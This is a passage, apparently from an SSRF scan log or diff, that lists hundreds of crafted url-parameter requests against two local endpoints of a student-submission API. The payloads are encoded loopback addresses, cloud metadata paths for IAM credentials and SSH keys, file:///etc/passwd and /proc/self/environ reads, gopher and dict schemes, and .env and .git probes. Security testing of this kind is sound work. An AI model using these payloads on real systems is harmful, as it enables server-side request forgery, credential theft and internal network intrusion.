Testing: `http://localhost:4200/api/students?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/students?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/students?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/students?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/students?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=0%2F` +- Testing: `http://localhost:4200/api/students?url=127.1` +- Testing: `http://localhost:4200/api/students?url=127.0.1` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/students?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/students?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.1.3` +- Testing: `http://localhost:4200/api/students?url=0` +- Testing: `http://localhost:4200/api/students?url=127.1` +- Testing: `http://localhost:4200/api/students?url=127.0.1` +- Testing: `http://localhost:4200/api/students?url=localhost` +- Testing: `http://localhost:4200/api/students?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/students?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/students?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/students?url=7F000001` +- Testing: `http://localhost:4200/api/students?url=2130706433` +- Testing: `http://localhost:4200/api/students?url=6425673729` +- Testing: `http://localhost:4200/api/students?url=127001` +- Testing: `http://localhost:4200/api/students?url=127_0._0_1` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/students?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127` +- Testing: `http://localhost:4200/api/students?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=0x7f000001` +- Testing: `http://localhost:4200/api/students?url=017700000001` +- Testing: `http://localhost:4200/api/students?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/students?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/students?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/students?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/students?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/students?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254` +- Testing: `http://localhost:4200/api/students?url=2852039166` +- Testing: `http://localhost:4200/api/students?url=7147006462` +- Testing: `http://localhost:4200/api/students?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/students?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/students?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/students?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/students?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/students?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/students?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/students?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/students?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/students?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/students?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/students?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/students?url=127.0.0.0` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521` +- Testing: `http://localhost:4200/api/students?url=3232235777` +- Testing: `http://localhost:4200/api/students?url=425.510.425.510` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/students?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/students?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/students?url=instance-data` +- Testing: `http://localhost:4200/api/students?url=localhost%3A22` +- Testing: `http://localhost:4200/api/students?url=localhost%3A443` +- Testing: `http://localhost:4200/api/students?url=localhost%3A80` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/students?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/students?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/students?url=loopback` +- Testing: `http://localhost:4200/api/students?url=loopback%3A22` +- Testing: `http://localhost:4200/api/students?url=loopback%3A80` +- Testing: `http://localhost:4200/api/students?url=loopback%3A443` +- Testing: `http://localhost:4200/api/students?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/students?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/students?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/students?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/students?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/students?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/students?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/students?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/students?url=127.1%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/students?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/students?url=2130706433%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521%2F` +- Testing: `http://localhost:4200/api/students?url=3232235777%2F` +- Testing: `http://localhost:4200/api/students?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/students?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=0%2F` +- Testing: `http://localhost:4200/api/students?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/submission +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/submission?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/submission?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/submission?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/submission?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/submission?url=127.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=0` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/submission?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127` +- Testing: `http://localhost:4200/api/submission?url=127.0.1.3` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.0` +- Testing: `http://localhost:4200/api/submission?url=2130706433` +- Testing: `http://localhost:4200/api/submission?url=017700000001` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001` +- Testing: `http://localhost:4200/api/submission?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/submission?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/submission?url=google.com.localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/submission?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/submission?url=2130706433%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235777%2F` +- Testing: `http://localhost:4200/api/submission?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/submission?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/submission?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/submission?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/submission?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A%2B11211aaa` +- Testing: 